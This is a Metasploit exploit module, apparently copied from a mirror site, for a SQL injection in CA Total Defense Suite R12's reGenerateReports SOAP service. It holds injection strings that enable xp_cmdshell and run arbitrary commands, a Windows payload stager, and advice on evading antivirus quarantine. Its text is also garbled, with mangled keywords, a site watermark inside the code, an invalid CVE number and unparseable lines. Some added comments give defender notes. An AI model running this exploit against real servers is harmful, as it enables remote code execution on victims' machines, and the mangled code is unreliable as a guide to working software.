##
# $Id: ca_totaldefense_regeneratereports.rb 13810 2011-10-02 17:03:23Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
Require 'msf/core'
# Metasploit remote exploit module for the CA Total Defense Suite R12
# reGenerateReports SQL injection (see the 'References' below). The text on
# this page is case- and whitespace-mangled (e.g. capitalised keywords,
# spaces inside identifiers); the comments here describe what the visible
# code does, not a cleaned-up reconstruction of it.
#
# Mixins: an HTTP client (HttpClient) for the SOAP requests, plus a mixin
# whose name is garbled on the next line -- the execute_cmdstager call in
# windows_stager suggests a command-stager mixin (presumably CmdStagerTFTP;
# confirm against the upstream module).
Class Metasploit3 <Msf: Exploit: Remote
Rank = GreatRanking
Include Msf: Exploit: Export stagertftp
Include Msf: Exploit: Remote: HttpClient
# Module metadata and options.
#   Targets: one entry, Windows / x86; 'Platform' => 'win' is what exploit()
#   dispatches on. 'Privileged' => true, disclosure date Apr 13 2011.
#   Options: RPORT 34443, SSL on by default, and 'cmd' -- when non-empty,
#   exploit() runs that command through the injection and returns without
#   staging the payload.
# NOTE(review): the token on the register_options line (www.2cto.com) looks
# like a mirror-site watermark that was pasted into the code, not Ruby.
Def initialize (info = {})
Super (update_info (info,
'Name' => 'Ca Total Defense Suite reGenerateReports Stored Procedure SQL Injection ',
'Description' => % q {
This module exploits an SQL injection flaw in CA Total Defense Suite R12.
When supplying a specially crafted soap request to '/UNCWS/Management. asmx',
Attacker can abuse the reGenerateReports stored procedure by injecting arbitrary SQL
Statements into the ReportIDs element.
NOTE: This module was tested against the ms SQL Server 2005 Express that's bundled
CA Total Defense Suite R12. CA's Total Defense Suite real-time protection
Will quarantine the default framework executable payload. Choosing an alternate
Exe template will bypass the quarantine.
},
'Author' => ['mc '],
'License '=> MSF_LICENSE,
'Version' => '$ Revision: 13810 $ ',
# The CVE value below is garbled on this page ('2017-2011' is not a valid
# CVE id); take the identifier from the ZDI advisory, not from this line.
'References '=>
[
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-11-134'],
['Ossvdb', '123'],
['Cve', '2017-2011 '],
],
'Targets' =>
[
['Windows unival ',
{
'Arch '=> ARCH_X86,
'Platform' => 'win'
}
]
],
'Privileged' => true,
'Platform' => 'win ',
'Disclosuredate' => 'apr 13 2011 ',
'Defaulttarget' => 0 ))
Register_options (www.2cto.com
[
Opt: RPORT (34443 ),
OptBool. new ('ssl ', [true, 'use SSL', true]),
OptString. new ('cmd', [false, 'execute this command instead of using command stager ', ""])
], Self. class)
End
# Windows path: hand the payload to the command stager (temp dir '.'),
# then run the staged executable via execute_command.
# NOTE(review): exe_fname is assigned but never referenced in this body,
# and the parenthesisation on that line looks garbled (". exe" sits inside
# the rand_text_alphanumeric call) -- as printed it would not parse.
Def windows_stager
Exe_fname = rand_text_alphanumeric (4 + rand (4) + ". exe"
Print_status ("Sending request to # {datastore ['rhost'] }:# {datastore ['rport']}")
Execute_cmdstager ({: temp => '.'})
@ Payload_exe = payload_exe
Print_status ("Attempting to execute the payload ...")
Execute_command (@ payload_exe)
End
# Sends three SOAP requests to /UNCWS/Management.asmx, each carrying one of
# the strings below in the ReportIDs element: the first two flip the
# sp_configure options needed for xp_cmdshell, the third runs `cmd`.
# `opts` is accepted for interface compatibility but unused here.
#
# Defender notes (detection / mitigation):
#   * The SQL Server side of this is loud: 'show advanced options' and the
#     xp_cmdshell option being enabled via sp_configure + reconfigure are
#     configuration-change events worth auditing and alerting on, and
#     xp_cmdshell should stay disabled where the product does not need it.
#   * On the web tier, a POST to /UNCWS/Management.asmx whose ReportIDs
#     element contains quote characters, "Exec" or "--" is not a legitimate
#     report id; request logging at the service boundary exposes it.
#   * The root cause is unparameterised use of ReportIDs inside the stored
#     procedure; the vendor fix referenced by ZDI-11-134 and a least-privilege
#     SQL service account limit the blast radius.
# NOTE(review): 'xp _ mongoshell' on the second line looks garbled by
# extraction; given the third line it is presumably the xp_cmdshell option.
Def execute_command (cmd, opts = {})
Inject = [
"'') Exec master. dbo. sp_configure 'show advanced options', 1; reconfigure ;--",
"'') Exec master. dbo. sp_configure 'xp _ mongoshell', 1; reconfigure ;--",
"'') Exec master. dbo. xp_cmdshell 'cmd.exe/c # {cmd }';--",
]
# One SOAP 1.2 envelope per statement; EnterpriseID and UserID are fixed.
Inject. each do | sqli |
Soap = % Q | <? Xml version = "1.0" encoding = "UTF-8"?>
<Soap12: Envelope xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: soap12 = "http://www.w3.org/2003/05/soap-envelope">
<Soap12: Body>
<ReGenerateReports xmlns = "http://tempuri.org/">
<EnterpriseID> msf </EnterpriseID>
<ReportIDs >#{ sqli} </ReportIDs>
<UserID> 187 </UserID>
</ReGenerateReports>
</Soap12: Body>
</Soap12: Envelope>
|
# HTTP/1.0 POST with a 5-second timeout (second argument).
Res = send_request_cgi (
{
'Url' => '/UNCWS/Management. asmx ',
'Method' => 'post ',
'Version' => '1. 0 ',
'Ctype '=> 'application/soap + xml; charset = UTF-8 ',
'Data' => soap,
}, 5)
# Success is judged solely on 'SUCCESS' appearing in the response body;
# a timeout (nil res) or any other body aborts the whole sequence. The
# per-statement success message is commented out, so a passing run
# prints nothing here.
If (res and res. body = ~ /SUCCESS /)
# Print_good ("Executing command ...")
Else
Raise RuntimeError, 'something went wrong .'
End
End
End
# Entry point: a non-empty 'cmd' option short-circuits to a single command
# execution (no payload, no handler); otherwise dispatch on the target's
# 'Platform' and start the payload handler.
Def exploit
If not datastore ['cmd']. empty?
Print_status ("Executing command '# {datastore ['cmd']}'")
Execute_command (datastore ['cmd'])
Return
End
# Only 'win' is defined in 'Targets'; anything else raises.
Case target ['platform']
When 'win'
Windows_stager
Else
Raise RuntimeError, 'target not supported .'
End
Handler
End
End
__END__
POST /UNCWS/Management.asmx HTTP/1.1
Host: www.2cto.com
Content-Type: application/soap + xml; charset = UTF-8
Content-Length: length
<? Xml version = "1.0" encoding = "UTF-8"?>
<Soap12: Envelope xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: soap12 = "http://www.w3.org/2003/05/soap-envelope">
<Soap12: Body>
<ReGenerateReports xmlns = "http://tempuri.org/">
<EnterpriseID> string </EnterpriseID>
<ReportIDs> string </ReportIDs> <-- boom !!
<UserID> long </UserID>
</ReGenerateReports>
</Soap12: Body>
</Soap12: Envelope>